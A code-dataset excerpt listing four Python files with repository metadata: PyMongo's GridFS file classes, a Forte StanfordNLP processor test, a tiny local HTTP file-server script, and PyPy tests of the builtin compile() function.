max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---
gridfs/grid_file.py | naomielst/mongo-python-driver | 2 | 5500 | # Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tools for representing files stored in GridFS."""
import datetime
import io
import math
import os
from bson.int64 import Int64
from bson.son import SON
from bson.binary import Binary
from bson.objectid import ObjectId
from pymongo import ASCENDING
from pymongo.collection import Collection
from pymongo.cursor import Cursor
from pymongo.errors import (ConfigurationError,
CursorNotFound,
DuplicateKeyError,
InvalidOperation,
OperationFailure)
from pymongo.read_preferences import ReadPreference
from gridfs.errors import CorruptGridFile, FileExists, NoFile
try:
_SEEK_SET = os.SEEK_SET
_SEEK_CUR = os.SEEK_CUR
_SEEK_END = os.SEEK_END
# os.SEEK_* constants were added in Python 2.5; fall back to the literal values.
except AttributeError:
_SEEK_SET = 0
_SEEK_CUR = 1
_SEEK_END = 2
EMPTY = b""
NEWLN = b"\n"
"""Default chunk size, in bytes."""
# Slightly under a power of 2, to work well with server's record allocations.
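# 255 * 1024 = 261,120 bytes, which leaves roughly 1 KiB of headroom below the
# 256 KiB (262,144 byte) boundary for the rest of the chunk document
# (_id, files_id, n) before crossing the power-of-2 allocation size.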
DEFAULT_CHUNK_SIZE = 255 * 1024
_C_INDEX = SON([("files_id", ASCENDING), ("n", ASCENDING)])
_F_INDEX = SON([("filename", ASCENDING), ("uploadDate", ASCENDING)])
def _grid_in_property(field_name, docstring, read_only=False,
closed_only=False):
"""Create a GridIn property."""
def getter(self):
if closed_only and not self._closed:
raise AttributeError("can only get %r on a closed file" %
field_name)
# Protect against PHP-237
if field_name == 'length':
return self._file.get(field_name, 0)
return self._file.get(field_name, None)
def setter(self, value):
if self._closed:
self._coll.files.update_one({"_id": self._file["_id"]},
{"$set": {field_name: value}})
self._file[field_name] = value
if read_only:
docstring += "\n\nThis attribute is read-only."
elif closed_only:
docstring = "%s\n\n%s" % (docstring, "This attribute is read-only and "
"can only be read after :meth:`close` "
"has been called.")
if not read_only and not closed_only:
return property(getter, setter, doc=docstring)
return property(getter, doc=docstring)
def _grid_out_property(field_name, docstring):
"""Create a GridOut property."""
def getter(self):
self._ensure_file()
# Protect against PHP-237
if field_name == 'length':
return self._file.get(field_name, 0)
return self._file.get(field_name, None)
docstring += "\n\nThis attribute is read-only."
return property(getter, doc=docstring)
def _clear_entity_type_registry(entity, **kwargs):
"""Clear the given database/collection object's type registry."""
codecopts = entity.codec_options.with_options(type_registry=None)
return entity.with_options(codec_options=codecopts, **kwargs)
def _disallow_transactions(session):
if session and session.in_transaction:
raise InvalidOperation(
'GridFS does not support multi-document transactions')
class GridIn(object):
"""Class to write data to GridFS.
"""
def __init__(self, root_collection, session=None, **kwargs):
"""Write a file to GridFS
Application developers should generally not need to
instantiate this class directly - instead see the methods
provided by :class:`~gridfs.GridFS`.
Raises :class:`TypeError` if `root_collection` is not an
instance of :class:`~pymongo.collection.Collection`.
Any of the file level options specified in the `GridFS Spec
<http://dochub.mongodb.org/core/gridfsspec>`_ may be passed as
keyword arguments. Any additional keyword arguments will be
set as additional fields on the file document. Valid keyword
arguments include:
- ``"_id"``: unique ID for this file (default:
:class:`~bson.objectid.ObjectId`) - this ``"_id"`` must
not have already been used for another file
- ``"filename"``: human name for the file
- ``"contentType"`` or ``"content_type"``: valid mime-type
for the file
- ``"chunkSize"`` or ``"chunk_size"``: size of each of the
chunks, in bytes (default: 255 kb)
- ``"encoding"``: encoding used for this file. Any :class:`str`
that is written to the file will be converted to :class:`bytes`.
:Parameters:
- `root_collection`: root collection to write to
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` to use for all
commands
- `**kwargs` (optional): file level options (see above)
.. versionchanged:: 4.0
Removed the `disable_md5` parameter. See
:ref:`removed-gridfs-checksum` for details.
.. versionchanged:: 3.7
Added the `disable_md5` parameter.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.0
`root_collection` must use an acknowledged
:attr:`~pymongo.collection.Collection.write_concern`
"""
if not isinstance(root_collection, Collection):
raise TypeError("root_collection must be an "
"instance of Collection")
if not root_collection.write_concern.acknowledged:
raise ConfigurationError('root_collection must use '
'acknowledged write_concern')
_disallow_transactions(session)
# Handle alternative naming
if "content_type" in kwargs:
kwargs["contentType"] = kwargs.pop("content_type")
if "chunk_size" in kwargs:
kwargs["chunkSize"] = kwargs.pop("chunk_size")
coll = _clear_entity_type_registry(
root_collection, read_preference=ReadPreference.PRIMARY)
# Defaults
kwargs["_id"] = kwargs.get("_id", ObjectId())
kwargs["chunkSize"] = kwargs.get("chunkSize", DEFAULT_CHUNK_SIZE)
object.__setattr__(self, "_session", session)
object.__setattr__(self, "_coll", coll)
object.__setattr__(self, "_chunks", coll.chunks)
object.__setattr__(self, "_file", kwargs)
object.__setattr__(self, "_buffer", io.BytesIO())
object.__setattr__(self, "_position", 0)
object.__setattr__(self, "_chunk_number", 0)
object.__setattr__(self, "_closed", False)
object.__setattr__(self, "_ensured_index", False)
def __create_index(self, collection, index_key, unique):
doc = collection.find_one(projection={"_id": 1}, session=self._session)
if doc is None:
try:
index_keys = [index_spec['key'] for index_spec in
collection.list_indexes(session=self._session)]
except OperationFailure:
index_keys = []
if index_key not in index_keys:
collection.create_index(
index_key.items(), unique=unique, session=self._session)
def __ensure_indexes(self):
if not object.__getattribute__(self, "_ensured_index"):
_disallow_transactions(self._session)
self.__create_index(self._coll.files, _F_INDEX, False)
self.__create_index(self._coll.chunks, _C_INDEX, True)
object.__setattr__(self, "_ensured_index", True)
def abort(self):
"""Remove all chunks/files that may have been uploaded and close.
"""
self._coll.chunks.delete_many(
{"files_id": self._file['_id']}, session=self._session)
self._coll.files.delete_one(
{"_id": self._file['_id']}, session=self._session)
object.__setattr__(self, "_closed", True)
@property
def closed(self):
"""Is this file closed?
"""
return self._closed
_id = _grid_in_property("_id", "The ``'_id'`` value for this file.",
read_only=True)
filename = _grid_in_property("filename", "Name of this file.")
name = _grid_in_property("filename", "Alias for `filename`.")
content_type = _grid_in_property("contentType", "Mime-type for this file.")
length = _grid_in_property("length", "Length (in bytes) of this file.",
closed_only=True)
chunk_size = _grid_in_property("chunkSize", "Chunk size for this file.",
read_only=True)
upload_date = _grid_in_property("uploadDate",
"Date that this file was uploaded.",
closed_only=True)
md5 = _grid_in_property("md5", "MD5 of the contents of this file "
"if an md5 sum was created.",
closed_only=True)
def __getattr__(self, name):
if name in self._file:
return self._file[name]
raise AttributeError("GridIn object has no attribute '%s'" % name)
def __setattr__(self, name, value):
# For properties of this instance like _buffer, or descriptors set on
# the class like filename, use regular __setattr__
if name in self.__dict__ or name in self.__class__.__dict__:
object.__setattr__(self, name, value)
else:
# All other attributes are part of the document in db.fs.files.
# Store them to be sent to server on close() or if closed, send
# them now.
self._file[name] = value
if self._closed:
self._coll.files.update_one({"_id": self._file["_id"]},
{"$set": {name: value}})
def __flush_data(self, data):
"""Flush `data` to a chunk.
"""
self.__ensure_indexes()
if not data:
return
assert(len(data) <= self.chunk_size)
chunk = {"files_id": self._file["_id"],
"n": self._chunk_number,
"data": Binary(data)}
try:
self._chunks.insert_one(chunk, session=self._session)
except DuplicateKeyError:
self._raise_file_exists(self._file['_id'])
self._chunk_number += 1
self._position += len(data)
def __flush_buffer(self):
"""Flush the buffer contents out to a chunk.
"""
self.__flush_data(self._buffer.getvalue())
self._buffer.close()
self._buffer = io.BytesIO()
def __flush(self):
"""Flush the file to the database.
"""
try:
self.__flush_buffer()
# The GridFS spec says length SHOULD be an Int64.
self._file["length"] = Int64(self._position)
self._file["uploadDate"] = datetime.datetime.utcnow()
return self._coll.files.insert_one(
self._file, session=self._session)
except DuplicateKeyError:
self._raise_file_exists(self._id)
def _raise_file_exists(self, file_id):
"""Raise a FileExists exception for the given file_id."""
raise FileExists("file with _id %r already exists" % file_id)
def close(self):
"""Flush the file and close it.
A closed file cannot be written any more. Calling
:meth:`close` more than once is allowed.
"""
if not self._closed:
self.__flush()
object.__setattr__(self, "_closed", True)
def read(self, size=-1):
raise io.UnsupportedOperation('read')
def readable(self):
return False
def seekable(self):
return False
def write(self, data):
"""Write data to the file. There is no return value.
`data` can be either a string of bytes or a file-like object
(implementing :meth:`read`). If the file has an
:attr:`encoding` attribute, `data` can also be a
:class:`str` instance, which will be encoded as
:attr:`encoding` before being written.
Due to buffering, the data may not actually be written to the
database until the :meth:`close` method is called. Raises
:class:`ValueError` if this file is already closed. Raises
:class:`TypeError` if `data` is not an instance of
:class:`bytes`, a file-like object, or an instance of :class:`str`.
Unicode data is only allowed if the file has an :attr:`encoding`
attribute.
:Parameters:
- `data`: string of bytes or file-like object to be written
to the file
"""
if self._closed:
raise ValueError("cannot write to a closed file")
try:
# file-like
read = data.read
except AttributeError:
# string
if not isinstance(data, (str, bytes)):
raise TypeError("can only write strings or file-like objects")
if isinstance(data, str):
try:
data = data.encode(self.encoding)
except AttributeError:
raise TypeError("must specify an encoding for file in "
"order to write str")
read = io.BytesIO(data).read
if self._buffer.tell() > 0:
# Make sure to flush only when _buffer is complete
space = self.chunk_size - self._buffer.tell()
if space:
try:
to_write = read(space)
except:
self.abort()
raise
self._buffer.write(to_write)
if len(to_write) < space:
return # EOF or incomplete
self.__flush_buffer()
to_write = read(self.chunk_size)
while to_write and len(to_write) == self.chunk_size:
self.__flush_data(to_write)
to_write = read(self.chunk_size)
self._buffer.write(to_write)
def writelines(self, sequence):
"""Write a sequence of strings to the file.
Does not add separators.
"""
for line in sequence:
self.write(line)
def writeable(self):
return True
def __enter__(self):
"""Support for the context manager protocol.
"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Support for the context manager protocol.
Close the file and allow exceptions to propagate.
"""
self.close()
# propagate exceptions
return False
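# Example (not part of the original module): a minimal sketch of storing a
# payload with GridIn. The "example_db"/"fs" names and the passed-in MongoClient
# are assumptions for illustration only; applications normally obtain a GridIn
# through gridfs.GridFS.new_file() or put().
def _example_write_with_grid_in(client):
    """Write a small payload through GridIn and return the new file's _id."""
    fs_root = client["example_db"]["fs"]  # root collection, i.e. db.fs
    grid_in = GridIn(fs_root,
                     filename="hello.txt",
                     contentType="text/plain",
                     encoding="utf-8")
    try:
        grid_in.write("hello ")    # str is encoded using the file's encoding
        grid_in.write(b"world\n")  # bytes are written as-is
    except Exception:
        grid_in.abort()            # remove any chunks already flushed
        raise
    grid_in.close()                # flushes the buffer and inserts the files doc
    return grid_in._id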
class GridOut(io.IOBase):
"""Class to read data out of GridFS.
"""
def __init__(self, root_collection, file_id=None, file_document=None,
session=None):
"""Read a file from GridFS
Application developers should generally not need to
instantiate this class directly - instead see the methods
provided by :class:`~gridfs.GridFS`.
Either `file_id` or `file_document` must be specified,
`file_document` will be given priority if present. Raises
:class:`TypeError` if `root_collection` is not an instance of
:class:`~pymongo.collection.Collection`.
:Parameters:
- `root_collection`: root collection to read from
- `file_id` (optional): value of ``"_id"`` for the file to read
- `file_document` (optional): file document from
`root_collection.files`
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` to use for all
commands
.. versionchanged:: 3.8
For better performance and to better follow the GridFS spec,
:class:`GridOut` now uses a single cursor to read all the chunks in
the file.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.0
Creating a GridOut does not immediately retrieve the file metadata
from the server. Metadata is fetched when first needed.
"""
if not isinstance(root_collection, Collection):
raise TypeError("root_collection must be an "
"instance of Collection")
_disallow_transactions(session)
root_collection = _clear_entity_type_registry(root_collection)
super().__init__()
self.__chunks = root_collection.chunks
self.__files = root_collection.files
self.__file_id = file_id
self.__buffer = EMPTY
self.__chunk_iter = None
self.__position = 0
self._file = file_document
self._session = session
_id = _grid_out_property("_id", "The ``'_id'`` value for this file.")
filename = _grid_out_property("filename", "Name of this file.")
name = _grid_out_property("filename", "Alias for `filename`.")
content_type = _grid_out_property("contentType", "Mime-type for this file.")
length = _grid_out_property("length", "Length (in bytes) of this file.")
chunk_size = _grid_out_property("chunkSize", "Chunk size for this file.")
upload_date = _grid_out_property("uploadDate",
"Date that this file was first uploaded.")
aliases = _grid_out_property("aliases", "List of aliases for this file.")
metadata = _grid_out_property("metadata", "Metadata attached to this file.")
md5 = _grid_out_property("md5", "MD5 of the contents of this file "
"if an md5 sum was created.")
def _ensure_file(self):
if not self._file:
_disallow_transactions(self._session)
self._file = self.__files.find_one({"_id": self.__file_id},
session=self._session)
if not self._file:
raise NoFile("no file in gridfs collection %r with _id %r" %
(self.__files, self.__file_id))
def __getattr__(self, name):
self._ensure_file()
if name in self._file:
return self._file[name]
raise AttributeError("GridOut object has no attribute '%s'" % name)
def readable(self):
return True
def readchunk(self):
"""Reads a chunk at a time. If the current position is within a
chunk the remainder of the chunk is returned.
"""
received = len(self.__buffer)
chunk_data = EMPTY
chunk_size = int(self.chunk_size)
if received > 0:
chunk_data = self.__buffer
elif self.__position < int(self.length):
chunk_number = int((received + self.__position) / chunk_size)
if self.__chunk_iter is None:
self.__chunk_iter = _GridOutChunkIterator(
self, self.__chunks, self._session, chunk_number)
chunk = self.__chunk_iter.next()
chunk_data = chunk["data"][self.__position % chunk_size:]
if not chunk_data:
raise CorruptGridFile("truncated chunk")
self.__position += len(chunk_data)
self.__buffer = EMPTY
return chunk_data
def read(self, size=-1):
"""Read at most `size` bytes from the file (less if there
isn't enough data).
The bytes are returned as an instance of :class:`bytes`. If `size` is
negative or omitted all data is read.
:Parameters:
- `size` (optional): the number of bytes to read
.. versionchanged:: 3.8
This method now only checks for extra chunks after reading the
entire file. Previously, this method would check for extra chunks
on every call.
"""
self._ensure_file()
remainder = int(self.length) - self.__position
if size < 0 or size > remainder:
size = remainder
if size == 0:
return EMPTY
received = 0
data = io.BytesIO()
while received < size:
chunk_data = self.readchunk()
received += len(chunk_data)
data.write(chunk_data)
# Detect extra chunks after reading the entire file.
if size == remainder and self.__chunk_iter:
try:
self.__chunk_iter.next()
except StopIteration:
pass
self.__position -= received - size
# Return 'size' bytes and store the rest.
data.seek(size)
self.__buffer = data.read()
data.seek(0)
return data.read(size)
def readline(self, size=-1):
"""Read one line or up to `size` bytes from the file.
:Parameters:
- `size` (optional): the maximum number of bytes to read
"""
remainder = int(self.length) - self.__position
if size < 0 or size > remainder:
size = remainder
if size == 0:
return EMPTY
received = 0
data = io.BytesIO()
while received < size:
chunk_data = self.readchunk()
pos = chunk_data.find(NEWLN, 0, size)
if pos != -1:
size = received + pos + 1
received += len(chunk_data)
data.write(chunk_data)
if pos != -1:
break
self.__position -= received - size
# Return 'size' bytes and store the rest.
data.seek(size)
self.__buffer = data.read()
data.seek(0)
return data.read(size)
def tell(self):
"""Return the current position of this file.
"""
return self.__position
def seek(self, pos, whence=_SEEK_SET):
"""Set the current position of this file.
:Parameters:
- `pos`: the position (or offset if using relative
positioning) to seek to
- `whence` (optional): where to seek
from. :attr:`os.SEEK_SET` (``0``) for absolute file
positioning, :attr:`os.SEEK_CUR` (``1``) to seek relative
to the current position, :attr:`os.SEEK_END` (``2``) to
seek relative to the file's end.
"""
if whence == _SEEK_SET:
new_pos = pos
elif whence == _SEEK_CUR:
new_pos = self.__position + pos
elif whence == _SEEK_END:
new_pos = int(self.length) + pos
else:
raise IOError(22, "Invalid value for `whence`")
if new_pos < 0:
raise IOError(22, "Invalid value for `pos` - must be positive")
# Optimization, continue using the same buffer and chunk iterator.
if new_pos == self.__position:
return
self.__position = new_pos
self.__buffer = EMPTY
if self.__chunk_iter:
self.__chunk_iter.close()
self.__chunk_iter = None
def seekable(self):
return True
def __iter__(self):
"""Return an iterator over all of this file's data.
The iterator will return lines (delimited by ``b'\\n'``) of
:class:`bytes`. This can be useful when serving files
using a webserver that handles such an iterator efficiently.
.. versionchanged:: 3.8
The iterator now raises :class:`CorruptGridFile` when encountering
any truncated, missing, or extra chunk in a file. The previous
behavior was to only raise :class:`CorruptGridFile` on a missing
chunk.
.. versionchanged:: 4.0
The iterator now iterates over *lines* in the file, instead
of chunks, to conform to the base class :py:class:`io.IOBase`.
Use :meth:`GridOut.readchunk` to read chunk by chunk instead
of line by line.
"""
return self
def close(self):
"""Make GridOut more generically file-like."""
if self.__chunk_iter:
self.__chunk_iter.close()
self.__chunk_iter = None
super().close()
def write(self, value):
raise io.UnsupportedOperation('write')
def writelines(self, lines):
raise io.UnsupportedOperation('writelines')
def writable(self):
return False
def __enter__(self):
"""Makes it possible to use :class:`GridOut` files
with the context manager protocol.
"""
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Makes it possible to use :class:`GridOut` files
with the context manager protocol.
"""
self.close()
return False
def fileno(self):
raise io.UnsupportedOperation('fileno')
def flush(self):
# GridOut is read-only, so flush does nothing.
pass
def isatty(self):
return False
def truncate(self, size=None):
# See https://docs.python.org/3/library/io.html#io.IOBase.writable
# for why truncate has to raise.
raise io.UnsupportedOperation('truncate')
# Override IOBase.__del__ otherwise it will lead to __getattr__ on
# __IOBase_closed which calls _ensure_file and potentially performs I/O.
# We cannot do I/O in __del__ since it can lead to a deadlock.
def __del__(self):
pass
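# Example (not part of the original module): a minimal sketch of reading a file
# back through GridOut. The "example_db"/"fs" names mirror the GridIn sketch
# above and are assumptions; applications normally obtain GridOut objects from
# gridfs.GridFS.get() or find().
def _example_read_with_grid_out(client, file_id):
    """Read a stored file and return its first kilobyte plus the full contents."""
    fs_root = client["example_db"]["fs"]
    grid_out = GridOut(fs_root, file_id=file_id)
    first_kb = grid_out.read(1024)       # read at most 1024 bytes
    grid_out.seek(0)                     # rewind to the beginning
    lines = [line for line in grid_out]  # iterate over b"\n"-delimited lines
    grid_out.close()
    return first_kb, b"".join(lines)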
class _GridOutChunkIterator(object):
"""Iterates over a file's chunks using a single cursor.
Raises CorruptGridFile when encountering any truncated, missing, or extra
chunk in a file.
"""
def __init__(self, grid_out, chunks, session, next_chunk):
self._id = grid_out._id
self._chunk_size = int(grid_out.chunk_size)
self._length = int(grid_out.length)
self._chunks = chunks
self._session = session
self._next_chunk = next_chunk
self._num_chunks = math.ceil(float(self._length) / self._chunk_size)
self._cursor = None
def expected_chunk_length(self, chunk_n):
if chunk_n < self._num_chunks - 1:
return self._chunk_size
return self._length - (self._chunk_size * (self._num_chunks - 1))
def __iter__(self):
return self
def _create_cursor(self):
filter = {"files_id": self._id}
if self._next_chunk > 0:
filter["n"] = {"$gte": self._next_chunk}
_disallow_transactions(self._session)
self._cursor = self._chunks.find(filter, sort=[("n", 1)],
session=self._session)
def _next_with_retry(self):
"""Return the next chunk and retry once on CursorNotFound.
We retry on CursorNotFound to maintain backwards compatibility in
cases where two calls to read occur more than 10 minutes apart (the
server's default cursor timeout).
"""
if self._cursor is None:
self._create_cursor()
try:
return self._cursor.next()
except CursorNotFound:
self._cursor.close()
self._create_cursor()
return self._cursor.next()
def next(self):
try:
chunk = self._next_with_retry()
except StopIteration:
if self._next_chunk >= self._num_chunks:
raise
raise CorruptGridFile("no chunk #%d" % self._next_chunk)
if chunk["n"] != self._next_chunk:
self.close()
raise CorruptGridFile(
"Missing chunk: expected chunk #%d but found "
"chunk with n=%d" % (self._next_chunk, chunk["n"]))
if chunk["n"] >= self._num_chunks:
# According to spec, ignore extra chunks if they are empty.
if len(chunk["data"]):
self.close()
raise CorruptGridFile(
"Extra chunk found: expected %d chunks but found "
"chunk with n=%d" % (self._num_chunks, chunk["n"]))
expected_length = self.expected_chunk_length(chunk["n"])
if len(chunk["data"]) != expected_length:
self.close()
raise CorruptGridFile(
"truncated chunk #%d: expected chunk length to be %d but "
"found chunk with length %d" % (
chunk["n"], expected_length, len(chunk["data"])))
self._next_chunk += 1
return chunk
__next__ = next
def close(self):
if self._cursor:
self._cursor.close()
self._cursor = None
class GridOutIterator(object):
def __init__(self, grid_out, chunks, session):
self.__chunk_iter = _GridOutChunkIterator(grid_out, chunks, session, 0)
def __iter__(self):
return self
def next(self):
chunk = self.__chunk_iter.next()
return bytes(chunk["data"])
__next__ = next
class GridOutCursor(Cursor):
"""A cursor / iterator for returning GridOut objects as the result
of an arbitrary query against the GridFS files collection.
"""
def __init__(self, collection, filter=None, skip=0, limit=0,
no_cursor_timeout=False, sort=None, batch_size=0,
session=None):
"""Create a new cursor, similar to the normal
:class:`~pymongo.cursor.Cursor`.
Should not be called directly by application developers - see
the :class:`~gridfs.GridFS` method :meth:`~gridfs.GridFS.find` instead.
.. versionadded:: 2.7
.. seealso:: The MongoDB documentation on `cursors <https://dochub.mongodb.org/core/cursors>`_.
"""
_disallow_transactions(session)
collection = _clear_entity_type_registry(collection)
# Hold on to the base "fs" collection to create GridOut objects later.
self.__root_collection = collection
super(GridOutCursor, self).__init__(
collection.files, filter, skip=skip, limit=limit,
no_cursor_timeout=no_cursor_timeout, sort=sort,
batch_size=batch_size, session=session)
def next(self):
"""Get next GridOut object from cursor.
"""
_disallow_transactions(self.session)
# Work around "super is not iterable" issue in Python 3.x
next_file = super(GridOutCursor, self).next()
return GridOut(self.__root_collection, file_document=next_file,
session=self.session)
__next__ = next
def add_option(self, *args, **kwargs):
raise NotImplementedError("Method does not exist for GridOutCursor")
def remove_option(self, *args, **kwargs):
raise NotImplementedError("Method does not exist for GridOutCursor")
def _clone_base(self, session):
"""Creates an empty GridOutCursor for information to be copied into.
"""
return GridOutCursor(self.__root_collection, session=session)
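# Example (not part of the original module): a minimal sketch of querying the
# files collection with GridOutCursor. Applications normally get such a cursor
# from gridfs.GridFS.find(); the "example_db"/"fs" names are assumptions.
def _example_find_files(client, filename):
    """Yield a GridOut for every stored file with the given filename."""
    fs_root = client["example_db"]["fs"]
    cursor = GridOutCursor(fs_root, {"filename": filename},
                           sort=[("uploadDate", -1)])
    for grid_out in cursor:
        yield grid_out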
| 2.1875 | 2 |
forte/processors/tests/stanfordnlp_processor_test.py | tcl326/forte | 0 | 5501 | """This module tests Stanford NLP processors."""
import os
import unittest
from texar.torch import HParams
from forte.pipeline import Pipeline
from forte.data.readers import StringReader
from forte.processors.stanfordnlp_processor import StandfordNLPProcessor
from ft.onto.base_ontology import Token, Sentence
class TestStanfordNLPProcessor(unittest.TestCase):
def setUp(self):
self.stanford_nlp = Pipeline()
self.stanford_nlp.set_reader(StringReader())
models_path = os.getcwd()
config = HParams({
"processors": "tokenize",
"lang": "en",
# Language code for the language to build the Pipeline
"use_gpu": False
}, StandfordNLPProcessor.default_hparams())
self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path),
config=config)
self.stanford_nlp.initialize()
# TODO
@unittest.skip("We need to test this without needing to download models "
"everytime")
def test_stanford_processor(self):
sentences = ["This tool is called Forte.",
"The goal of this project to help you build NLP "
"pipelines.",
"NLP has never been made this easy before."]
document = ' '.join(sentences)
pack = self.stanford_nlp.process(document)
print(pack)
| 2.65625 | 3 |
src/serve_files.py | eventh/m3u8looper | 0 | 5502 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Serve current folder files in a HTTP webserver.
"""
import socketserver
from threading import Thread
from http.server import SimpleHTTPRequestHandler
PORT = 8000
def start_http_server(port=PORT):
httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler)
thread = Thread(target = httpd.serve_forever)
thread.start()
return thread
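# A possible extension (not part of the original script): returning the server
# object as well allows a clean shutdown from the caller, e.g.
#   httpd, thread = start_stoppable_http_server()
#   ...  # serve for a while
#   httpd.shutdown(); thread.join()
def start_stoppable_http_server(port=PORT):
    """Like start_http_server, but also return the TCPServer so it can be stopped."""
    httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler)
    thread = Thread(target=httpd.serve_forever, daemon=True)
    thread.start()
    return httpd, thread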
if __name__ == '__main__':
thread = start_http_server()
thread.join()
| 2.90625 | 3 |
pypy/module/__builtin__/test/test_compile.py | yxzoro/pypy | 0 | 5503 | # coding: utf-8
class AppTestCompile:
def test_simple(self):
import sys
co = compile('1+2', '?', 'eval')
assert eval(co) == 3
co = compile(memoryview(b'1+2'), '?', 'eval')
assert eval(co) == 3
exc = raises(ValueError, compile, chr(0), '?', 'eval')
assert str(exc.value) == "source code string cannot contain null bytes"
compile("from __future__ import with_statement", "<test>", "exec")
raises(SyntaxError, compile, '-', '?', 'eval')
raises(SyntaxError, compile, '"\\xt"', '?', 'eval')
raises(ValueError, compile, '1+2', '?', 'maybenot')
raises(ValueError, compile, "\n", "<string>", "exec", 0xff)
raises(TypeError, compile, '1+2', 12, 34)
def test_error_message(self):
import re
compile('# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec')
compile(b'\xef\xbb\xbf\n', 'dummy', 'exec')
compile(b'\xef\xbb\xbf# -*- coding: utf-8 -*-\n', 'dummy', 'exec')
exc = raises(SyntaxError, compile,
b'# -*- coding: fake -*-\n', 'dummy', 'exec')
assert 'fake' in str(exc.value)
exc = raises(SyntaxError, compile,
b'\xef\xbb\xbf# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec')
assert 'iso-8859-15' in str(exc.value)
assert 'BOM' in str(exc.value)
exc = raises(SyntaxError, compile,
b'\xef\xbb\xbf# -*- coding: fake -*-\n', 'dummy', 'exec')
assert 'fake' in str(exc.value)
assert 'BOM' in str(exc.value)
def test_unicode(self):
try:
compile(u'-', '?', 'eval')
except SyntaxError as e:
assert e.lineno == 1
def test_unicode_encoding(self):
code = "# -*- coding: utf-8 -*-\npass\n"
compile(code, "tmp", "exec")
def test_bytes(self):
code = b"# -*- coding: utf-8 -*-\npass\n"
compile(code, "tmp", "exec")
c = compile(b"# coding: latin1\nfoo = 'caf\xe9'\n", "<string>", "exec")
ns = {}
exec(c, ns)
assert ns['foo'] == 'café'
assert eval(b"# coding: latin1\n'caf\xe9'\n") == 'café'
def test_memoryview(self):
m = memoryview(b'2 + 1')
co = compile(m, 'baz', 'eval')
assert eval(co) == 3
assert eval(m) == 3
ns = {}
exec(memoryview(b'r = 2 + 1'), ns)
assert ns['r'] == 3
def test_recompile_ast(self):
import _ast
# raise exception when node type doesn't match with compile mode
co1 = compile('print(1)', '<string>', 'exec', _ast.PyCF_ONLY_AST)
raises(TypeError, compile, co1, '<ast>', 'eval')
co2 = compile('1+1', '<string>', 'eval', _ast.PyCF_ONLY_AST)
tree = compile(co2, '<ast>', 'eval')
assert compile(co2, '<ast>', 'eval', _ast.PyCF_ONLY_AST) is co2
def test_leading_newlines(self):
src = """
def fn(): pass
"""
co = compile(src, 'mymod', 'exec')
firstlineno = co.co_firstlineno
assert firstlineno == 2
def test_null_bytes(self):
raises(ValueError, compile, '\x00', 'mymod', 'exec', 0)
src = "#abc\x00def\n"
raises(ValueError, compile, src, 'mymod', 'exec')
raises(ValueError, compile, src, 'mymod', 'exec', 0)
def test_null_bytes_flag(self):
try:
from _ast import PyCF_ACCEPT_NULL_BYTES
except ImportError:
skip('PyPy only (requires _ast.PyCF_ACCEPT_NULL_BYTES)')
raises(SyntaxError, compile, '\x00', 'mymod', 'exec',
PyCF_ACCEPT_NULL_BYTES)
src = "#abc\x00def\n"
compile(src, 'mymod', 'exec', PyCF_ACCEPT_NULL_BYTES) # works
def test_compile_regression(self):
"""Clone of the part of the original test that was failing."""
import ast
codestr = '''def f():
"""doc"""
try:
assert False
except AssertionError:
return (True, f.__doc__)
else:
return (False, f.__doc__)
'''
def f(): """doc"""
values = [(-1, __debug__, f.__doc__),
(0, True, 'doc'),
(1, False, 'doc'),
(2, False, None)]
for optval, debugval, docstring in values:
# test both direct compilation and compilation via AST
codeobjs = []
codeobjs.append(
compile(codestr, "<test>", "exec", optimize=optval))
tree = ast.parse(codestr)
codeobjs.append(compile(tree, "<test>", "exec", optimize=optval))
for i, code in enumerate(codeobjs):
print(optval, debugval, docstring, i)
ns = {}
exec(code, ns)
rv = ns['f']()
assert rv == (debugval, docstring)
def test_assert_remove(self):
"""Test removal of the asserts with optimize=1."""
import ast
code = """def f():
assert False
"""
tree = ast.parse(code)
for to_compile in [code, tree]:
compiled = compile(to_compile, "<test>", "exec", optimize=1)
ns = {}
exec(compiled, ns)
ns['f']()
def test_docstring_remove(self):
"""Test removal of docstrings with optimize=2."""
import ast
import marshal
code = """
'module_doc'
def f():
'func_doc'
class C:
'class_doc'
"""
tree = ast.parse(code)
for to_compile in [code, tree]:
compiled = compile(to_compile, "<test>", "exec", optimize=2)
ns = {}
exec(compiled, ns)
assert '__doc__' not in ns
assert ns['f'].__doc__ is None
assert ns['C'].__doc__ is None
# Check that the docstrings are gone from the bytecode and not just
# inaccessible.
marshalled = str(marshal.dumps(compiled))
assert 'module_doc' not in marshalled
assert 'func_doc' not in marshalled
assert 'class_doc' not in marshalled
class TestOptimizeO:
"""Test interaction of -O flag and optimize parameter of compile."""
def setup_method(self, method):
space = self.space
self._sys_debug = space.sys.debug
# imitate -O
space.sys.debug = False
def teardown_method(self, method):
self.space.sys.debug = self._sys_debug
def test_O_optmize_0(self):
"""Test that assert is not ignored if -O flag is set but optimize=0."""
space = self.space
w_res = space.appexec([], """():
assert False # check that our -O imitation hack works
try:
exec(compile('assert False', '', 'exec', optimize=0))
except AssertionError:
return True
else:
return False
""")
assert space.unwrap(w_res)
def test_O_optimize__1(self):
"""Test that assert is ignored with -O and optimize=-1."""
space = self.space
space.appexec([], """():
exec(compile('assert False', '', 'exec', optimize=-1))
""")
